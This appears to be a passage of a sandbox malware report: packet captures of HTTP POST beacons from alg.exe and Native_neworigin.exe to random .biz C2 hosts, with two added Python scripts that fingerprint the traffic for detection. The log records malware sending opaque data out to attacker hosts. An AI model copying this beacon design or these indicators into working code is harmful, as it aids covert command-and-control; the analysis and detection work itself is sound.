    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
71         | 192.168.2.10 | 50052       | 18.141.10.107  | 80               | 6072 | C:\Windows\System32\alg.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:13.769371986 CET | 353 | OUT
    POST /ljnnvokac HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: acwjcqqv.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 26, 2024 08:15:13.769371986 CET | 778 | OUT
    Data Raw: 68 df c4 ed da 05 1b c8 fe 02 00 00 c8 b1 f4 81 8a 59 9a 5c d1 13 b5 b7 3b 34 db 87 f6 9e e4 e2 55 2c 05 7c 33 0c 30 6e 87 f9 4d 57 07 a1 35 b3 c4 fb 3f cc fd 8a 34 15 90 0d d9 2a b3 84 ba b3 16 ae 63 8d 6f ba ac dc 55 ca 19 6c ef 08 dc 2a a4 33
    Data Ascii: hY\;4U,|30nMW5?4*coUl*3fkIa&g[T9M|VV0U_!C<5?qarU^18Y;=^y)/?BFE !iyogs:lkTYyO}L3UqhX6<$G!<
Nov 26, 2024 08:15:15.889539957 CET | 410 | IN
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:15:15 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=2a54b335a2ebbf1f7b7d63346df2b9c1|8.46.123.75|1732605315|1732605315|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
72         | 192.168.2.10 | 50053       | 34.211.97.45   | 80               | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:14.185718060 CET | 342 | OUT
    POST /y HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: jpskm.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:15:14.185745001 CET | 834 | OUT
    Data Raw: c0 c5 d5 b9 80 c1 6e 89 36 03 00 00 e0 08 54 15 01 99 f8 a2 c7 17 70 c9 59 f8 38 97 b4 8a f5 48 4e 0c c2 76 6d 40 2c c0 4b 26 5b 06 44 0a dc 92 dc 46 b7 4e ed cd 3c 74 fa c5 36 2a a9 ae 07 25 00 6d 8e c3 e8 e0 79 d7 7b 4c 2d 03 3c aa fd 7b 9b 04
    Data Ascii: n6TpY8HNvm@,K&[DFN<t6*%my{L-<{/*9,R8+gLUEu)LVei u/O5mf*hEYV&0FtiY~#H"p/e?abnGLEi)G]]AS*T$
Nov 26, 2024 08:15:15.635694981 CET | 407 | IN
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:15:15 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=7147dbe73fab5f9d7b2d371fc3822331|8.46.123.75|1732605315|1732605315|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0

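The four outbound POSTs recorded in sessions 70 through 73 share one request shape: a short all-lowercase path, a short random label under .biz, the same WeChat/QQBrowser User-Agent, the Cache-Control/Pragma no-cache pair, and a binary body. In each captured body, bytes 8..11 of the "Data Raw" dump read as a little-endian uint32 equal Content-Length minus 12 (0x336 = 822 for the 834-byte bodies, 0x2fe = 766 for the 778-byte body). The following is an added example, not part of the Joe Sandbox report or of the analysed malware: it encodes those observations as a fingerprint check over the report's own values. The path and host regexes, the 12-byte prefix split and the "3 or more hits" threshold are the editor's assumptions; the meaning of the first 8 body bytes is unknown and is not interpreted.

```python
import re
import struct

# Constant across all four captured requests (copied from the report).
C2_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
         "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
         "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")
C2_HEADERS = {"Cache-Control": "no-cache", "Connection": "Keep-Alive", "Pragma": "no-cache"}

# Sample input copied from sessions 70-73 of the report:
# (session id, request line, Host, Content-Length, first 12 bytes of "Data Raw").
SAMPLE_SESSIONS = [
    (70, "POST /njk HTTP/1.1",          "yunalwv.biz",  834, "92 13 f2 62 56 61 78 bc 36 03 00 00"),
    (71, "POST /ljnnvokac HTTP/1.1",    "acwjcqqv.biz", 778, "68 df c4 ed da 05 1b c8 fe 02 00 00"),
    (72, "POST /y HTTP/1.1",            "jpskm.biz",    834, "c0 c5 d5 b9 80 c1 6e 89 36 03 00 00"),
    (73, "POST /heowijklptfa HTTP/1.1", "lrxdmhrr.biz", 834, "2b 88 f2 e0 82 8d 0a 67 36 03 00 00"),
]

# Assumed thresholds (editor's choice, not values taken from the report).
PATH_RE = re.compile(r"^/[a-z]{1,16}$")       # short lowercase path, no extension or query
HOST_RE = re.compile(r"^[a-z]{4,12}\.biz$")   # single random lowercase label under .biz
PREFIX_LEN = 12                               # assumed header size in front of the payload


def parse_body_prefix(hexdump: str) -> tuple[bytes, int]:
    """Split the leading 12 bytes into an opaque 8-byte field and a little-endian uint32.

    What the first 8 bytes carry is unknown; only the length relation is used.
    """
    raw = bytes.fromhex(hexdump.replace(" ", ""))
    if len(raw) < PREFIX_LEN:
        raise ValueError(f"need at least {PREFIX_LEN} bytes, got {len(raw)}")
    (length,) = struct.unpack_from("<I", raw, 8)
    return raw[:8], length


def length_field_consistent(content_length: int, hexdump: str) -> bool:
    """True when bytes 8..11 equal Content-Length minus the 12-byte prefix."""
    _, declared = parse_body_prefix(hexdump)
    return declared == content_length - PREFIX_LEN


def request_features(request_line: str, host: str, user_agent: str, headers: dict) -> list[str]:
    """Return the fingerprint features this request shares with the captured C2 POSTs."""
    method, path, _version = request_line.split(" ", 2)
    hits = []
    if method == "POST" and PATH_RE.match(path):
        hits.append("short-random-path")
    if HOST_RE.match(host):
        hits.append("random-biz-host")
    if user_agent == C2_UA:
        hits.append("wechat-qqbrowser-ua")
    if headers.get("Cache-Control") == "no-cache" and headers.get("Pragma") == "no-cache":
        hits.append("no-cache-pair")
    return hits


def classify(sessions=SAMPLE_SESSIONS, user_agent=C2_UA, headers=C2_HEADERS) -> dict[int, dict]:
    """Score each session: header fingerprint hits plus the body length relation."""
    results = {}
    for sid, request_line, host, content_length, first_bytes in sessions:
        hits = request_features(request_line, host, user_agent, headers)
        results[sid] = {
            "hits": hits,
            "length_ok": length_field_consistent(content_length, first_bytes),
            "suspicious": len(hits) >= 3,   # assumed alerting threshold
        }
    return results


if __name__ == "__main__":
    for sid, result in classify().items():
        print(sid, result)
```

The User-Agent and the no-cache pair are the cheapest fields to pivot on in proxy logs; the length relation is the stronger indicator because a benign upload will not satisfy it, but it needs the first 12 body bytes, which most proxies do not log.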

Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
73         | 192.168.2.10 | 50054       | 54.244.188.177 | 80               | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:15.932621956 CET | 356 | OUT
    POST /heowijklptfa HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: lrxdmhrr.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:15:15.932656050 CET | 834 | OUT
    Data Raw: 2b 88 f2 e0 82 8d 0a 67 36 03 00 00 34 ae bf a5 fb c3 b4 8e 21 00 2f 6b fb 50 69 93 d6 e0 83 e3 2d 91 07 11 1f dd e2 3e 9d a8 22 24 14 3c 6e 2d cb bc cc 03 09 01 c5 65 96 de 04 9e 03 63 dc f0 c4 e3 74 a6 8e ef 47 2f 63 be bd b9 79 04 ee 0e 79 ad
    Data Ascii: +g64!/kPi->"$<n-ectG/cyyp~B=pZ4c* Bb",MpGImJ"&<\RjV3t{'fBpbV+d+5QgoH0Y}E)9*Hy-TxrjhI`WRn*/
Nov 26, 2024 08:15:17.286962032 CET | 410 | IN
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:15:17 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=4ae1d96ed42d4adedde3202a043fd38c|8.46.123.75|1732605317|1732605317|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID: 74 | Source IP: 192.168.2.10 | Source Port: 50055 | Destination IP: 18.246.231.120 | Destination Port: 80 | PID: 6072 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:16.689461946 CET | 343 | OUT | POST /jt HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vyome.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 26, 2024 08:15:16.689579010 CET | 778 | OUT | Data Raw: f1 8c 13 6a d3 bd 44 cc fe 02 00 00 06 0c 7f 35 2a e3 9d f2 75 0b 0a 1a ef e8 af 61 7b 8e 3f e1 50 92 b0 20 32 39 85 c1 36 72 c3 e4 ad d8 b4 a1 18 ab ec d3 bf 65 c3 e2 22 3a 84 e5 ef 41 f1 f8 45 d8 d6 27 92 b0 89 9a 07 93 0b db a9 77 3d cd 45 34
    Data Ascii: jD5*ua{?P 296re":AE'w=E4uP[^]>YIq%B1 ;P23,?GEF>d1aYs}nG}_pEJ E:-5Q}"x6Dv1byj{%,Vrd1
Nov 26, 2024 08:15:18.147669077 CET | 407 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:15:17 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=eb73988ade21598fcf6481e1ea9a4133|8.46.123.75|1732605317|1732605317|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 75 | Source IP: 192.168.2.10 | Source Port: 50056 | Destination IP: 18.141.10.107 | Destination Port: 80 | PID: 7892 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:17.571510077 CET | 357 | OUT | POST /gerofbpnhxbnel HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: wllvnzb.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:15:17.571510077 CET | 834 | OUT | Data Raw: cc 7c 45 4c 46 9b 7d 24 36 03 00 00 59 08 f4 ce e8 2c f3 75 88 54 e6 d0 f3 23 58 c2 3e d3 f5 1d f3 68 de db 3b 66 f3 7c 8f be e9 6e 03 cd d7 13 26 68 49 4d 8c 10 31 c1 01 18 d4 fa 50 8c 08 2e 6d 42 e9 44 6c fc c4 9c 4c 1b a8 a9 8a 16 ab 48 aa 48
    Data Ascii: |ELF}$6Y,uT#X>h;f|n&hIM1P.mBDlLHHYfOSP%l}rjAq)L5yQv`<Ppw!2xmt4X@TPsr<R9v.3~rgGZuRL7z3Ko(
Nov 26, 2024 08:15:19.601514101 CET | 409 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:15:19 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=06110f42e336fce04bbbbd6b19650873|8.46.123.75|1732605319|1732605319|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 76 | Source IP: 192.168.2.10 | Source Port: 50057 | Destination IP: 18.208.156.248 | Destination Port: 80 | PID: 6072 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:19.221976042 CET | 354 | OUT | POST /negfyndqat HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: yauexmxk.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 26, 2024 08:15:19.222016096 CET | 778 | OUT | Data Raw: 21 28 7c 37 12 d2 4b a1 fe 02 00 00 4b 73 a3 53 5a 66 da d4 5d 6b ec 2a 6e ef d0 61 cc c2 46 bb f9 74 b2 c1 d8 2e 40 19 bf 2f 65 86 0f d9 2e 7f a1 22 b0 f4 0c b6 1c a1 e2 3e 20 32 72 11 11 2e 72 53 46 85 2c ff 3c 37 73 b0 99 e7 5f c4 40 0f 6b 21
    Data Ascii: !(|7KKsSZf]k*naFt.@/e."> 2r.rSF,<7s_@k!^Yc,A0Y7qewPO)Mc@dM}b9LXFbT{12~y~sy`-Vc:#{7D5|EA}`<P
Nov 26, 2024 08:15:20.118881941 CET | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:15:19 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=1a443072cabe0f0acf77edff343dfd23|8.46.123.75|1732605319|1732605319|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0

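The sessions above share more than a destination TLD: every request from alg.exe and Native_neworigin.exe carries the same WeChat/QQBrowser User-Agent and the same Cache-Control/Pragma no-cache pair, POSTs to a short lowercase path on a .biz host, and sends a body of exactly 778 or 834 bytes. In each body printed under "Data Raw", bytes 8 to 11 read as a little-endian uint32 give 766 (fe 02 00 00) or 822 (36 03 00 00), which is the body length minus 12, so an 8-byte opaque field followed by a length-prefixed payload is a reasonable reading, though not something the report confirms. Every server answered 200 OK with only the chunked terminator (30 0d 0a 0d 0a, an empty body) and set a btst cookie whose fields are a 32-hex token, the client's public IP (8.46.123.75, the sandbox's egress), and two Unix timestamps equal to the response's own Date header (the report's CET timestamps are one hour ahead of the GMT Date headers, as expected). The following script, added here as an editor's example and not part of the Joe Sandbox report or of the sample, checks those properties over data constructed from sessions 74 to 77; the field names, the indicator names and the prefix layout are this example's own assumptions.

```python
"""Structural checks on the HTTP beacons in sessions 74-77 above.
Added example; the 12-byte prefix layout, the btst field names and the
indicator names are assumptions consistent with the bodies shown."""
import re
import struct
from email.utils import parsedate_to_datetime

# Constructed from the report: first 12 bytes of each POST body ("Data Raw")
# and the Date plus btst name=value of the matching 200 OK where it was shown.
BEACONS = [
    {"session": 74, "host": "vyome.biz", "path": "/jt", "content_length": 778,
     "prefix": "f1 8c 13 6a d3 bd 44 cc fe 02 00 00",
     "date": "Tue, 26 Nov 2024 07:15:17 GMT",
     "cookie": "btst=eb73988ade21598fcf6481e1ea9a4133|8.46.123.75|1732605317|1732605317|0|1|0"},
    {"session": 75, "host": "wllvnzb.biz", "path": "/gerofbpnhxbnel", "content_length": 834,
     "prefix": "cc 7c 45 4c 46 9b 7d 24 36 03 00 00",
     "date": "Tue, 26 Nov 2024 07:15:19 GMT",
     "cookie": "btst=06110f42e336fce04bbbbd6b19650873|8.46.123.75|1732605319|1732605319|0|1|0"},
    {"session": 76, "host": "yauexmxk.biz", "path": "/negfyndqat", "content_length": 778,
     "prefix": "21 28 7c 37 12 d2 4b a1 fe 02 00 00",
     "date": "Tue, 26 Nov 2024 07:15:19 GMT",
     "cookie": "btst=1a443072cabe0f0acf77edff343dfd23|8.46.123.75|1732605319|1732605319|0|1|0"},
    {"session": 77, "host": "gnqgo.biz", "path": "/twv", "content_length": 834,
     "prefix": "c2 1d 19 ee 3d 56 ab be 36 03 00 00",
     "date": None, "cookie": None},  # response cut off in the report
]

# Request headers are identical across all four sessions.
REQUEST_HEADERS = {
    "Cache-Control": "no-cache", "Connection": "Keep-Alive", "Pragma": "no-cache",
    "User-Agent": ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
                   "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
                   "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400"),
}
PREFIX_LEN = 12


def parse_body_prefix(hex_dump):
    """Split the leading 12 bytes into an 8-byte opaque field and a
    little-endian uint32 (assumed layout, see the lead-in)."""
    raw = bytes.fromhex(hex_dump)[:PREFIX_LEN]
    (length,) = struct.unpack("<I", raw[8:12])
    return raw[:8], length


def length_field_consistent(hex_dump, content_length):
    """True when the uint32 equals Content-Length minus the prefix, i.e. it
    gives the size of the payload that follows (822 for 834, 766 for 778)."""
    return parse_body_prefix(hex_dump)[1] == content_length - PREFIX_LEN


def parse_btst(cookie):
    """Decode btst=<32 hex>|<client IP>|<unix ts>|<unix ts>|<n>|<n>|<n>
    (the name=value part only, without the path/domain attributes)."""
    m = re.fullmatch(r"btst=([0-9a-f]{32})\|([\d.]+)\|(\d+)\|(\d+)\|(\d+)\|(\d+)\|(\d+)", cookie)
    if not m:
        raise ValueError("not a btst cookie: %r" % cookie)
    token, ip, t1, t2, *flags = m.groups()
    return {"token": token, "client_ip": ip, "first": int(t1), "last": int(t2),
            "flags": tuple(int(f) for f in flags)}


def cookie_matches_date(cookie, date_header):
    """Both timestamps in btst should equal the response's own Date header."""
    ts = int(parsedate_to_datetime(date_header).timestamp())
    c = parse_btst(cookie)
    return c["first"] == ts and c["last"] == ts


def beacon_indicators(method, host, path, content_length, headers):
    """Name the traits shared by the four requests above that a request shows."""
    hits = []
    if method == "POST" and host.endswith(".biz") and re.fullmatch(r"/[a-z]{2,20}", path):
        hits.append("post-short-lowercase-path-on-.biz")
    if headers.get("User-Agent") == REQUEST_HEADERS["User-Agent"]:
        hits.append("wechat-qqbrowser-user-agent")
    if headers.get("Pragma") == "no-cache" and headers.get("Cache-Control") == "no-cache":
        hits.append("no-cache-header-pair")
    if content_length in (778, 834):
        hits.append("fixed-body-size")
    return hits


def client_ips_seen(beacons):
    """Public IPs the servers echoed back in btst (here the sandbox egress)."""
    return {parse_btst(b["cookie"])["client_ip"] for b in beacons if b["cookie"]}


def analyse(beacons):
    """Per-session summary; cookie_ok is None where no response was captured."""
    out = {}
    for b in beacons:
        opaque, _ = parse_body_prefix(b["prefix"])
        out[b["session"]] = {
            "indicators": beacon_indicators("POST", b["host"], b["path"],
                                            b["content_length"], REQUEST_HEADERS),
            "length_ok": length_field_consistent(b["prefix"], b["content_length"]),
            "opaque": opaque.hex(),
            "cookie_ok": cookie_matches_date(b["cookie"], b["date"]) if b["cookie"] else None,
        }
    return out


if __name__ == "__main__":
    for sid, row in analyse(BEACONS).items():
        print(sid, row)
    print("client IPs echoed by servers:", client_ips_seen(BEACONS))
```

The length check is the useful one for triage: if a body's bytes 8 to 11 stop matching Content-Length minus 12, either the assumed layout is wrong or a different message type is in play, and that session deserves a closer look. The 8-byte opaque field differs in every body shown, so it is the part to treat as per-message state rather than a signature.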

Session ID: 77 | Source IP: 192.168.2.10 | Source Port: 50058 | Destination IP: 18.208.156.248 | Destination Port: 80 | PID: 7892 | Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:19.906286001 CET | 344 | OUT | POST /twv HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: gnqgo.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:15:19.906322002 CET | 834 | OUT | Data Raw: c2 1d 19 ee 3d 56 ab be 36 03 00 00 77 dc 5b c5 7f b8 ba 3c 1b a8 3c 31 a4 7d 43 d1 76 de e8 14 11 12 cf ca dd fd 6e d3 8f 5c 68 33 22 15 bf b0 b2 12 e6 d2 b8 1c 0f a5 d7 83 d7 e7 3d f6 74 e2 b6 bc 1a a3 17 b7 08 ae 00 90 79 4e a6 be 61 07 17 27
    Data Ascii: =V6w[<<1}Cvn\h3"=tyNa'mRI$DaI rP7j.Ot%PnSq[jyuCNLOb?$R.5[+ \Lam3ozhO#ZjKO`u'9(><h'"xl\ou
Nov 26, 2024 08:15:21.105107069 CET | 407 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:20 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=315ffeba306d84b91b29f8bba38dbcda|8.46.123.75|1732605320|1732605320|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.10 | 50059 | 13.251.16.150 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:20.857287884 CET | 351 | OUT | POST /sfduvqthq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iuzpxe.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:15:20.857287884 CET | 778 | OUT | Data Raw: 58 3d f3 0f b4 c8 b1 fb fe 02 00 00 c1 9d 90 53 e6 b6 0e 22 26 7f 70 5c 06 0d 00 09 8b be 0c 9d 21 0e 23 a1 d4 89 49 6b ba 75 63 7d 46 6b 29 b3 da c4 1e 97 8e ee f9 b2 3d 20 f0 8e 27 91 fd 41 e4 20 90 27 1b 06 12 73 2c 2d 17 b4 10 18 39 ac bf b8
Data Ascii: X=S"&p\!#Ikuc}Fk)= 'A 's,-9L[>F%#@"V{nG&U#D1 M2p)nH3IE_2TrY?xKoUgLabdE\Dsn]!z|x-47aQh:O9&
Nov 26, 2024 08:15:22.891587019 CET | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b2d3e60ada42c8d3ac403ef05e4e3093|8.46.123.75|1732605322|1732605322|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.10 | 50060 | 44.221.84.105 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:15:21.459054947 CET | 354 | OUT | POST /oitokksbsu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jhvzpcfg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:15:21.459054947 CET | 834 | OUT | Data Raw: 74 32 a5 f6 f7 46 d0 7f 36 03 00 00 b1 7c 82 bd 8d 41 2f a3 4b 5d 7c d8 f9 3d 96 c5 ce b5 02 6b 55 d1 c9 22 3c 9f 40 f6 bb 9e 32 70 4c 4e e3 7d 95 5e 8a 7a b8 b7 58 5d 57 ef f2 30 e8 df 51 95 ea b2 5c 40 cd 0e 96 9d 96 de 3b 67 13 0d 06 99 c6 0f
Data Ascii: t2F6|A/K]|=kU"<@2pLN}^zX]W0Q\@;g|+6Ff&d^L`l=#%'u+r0jP=WOM'}yGWtqz+Cl$_*L,9rZy#r32
Nov 26, 2024 08:15:22.559572935 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:15:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
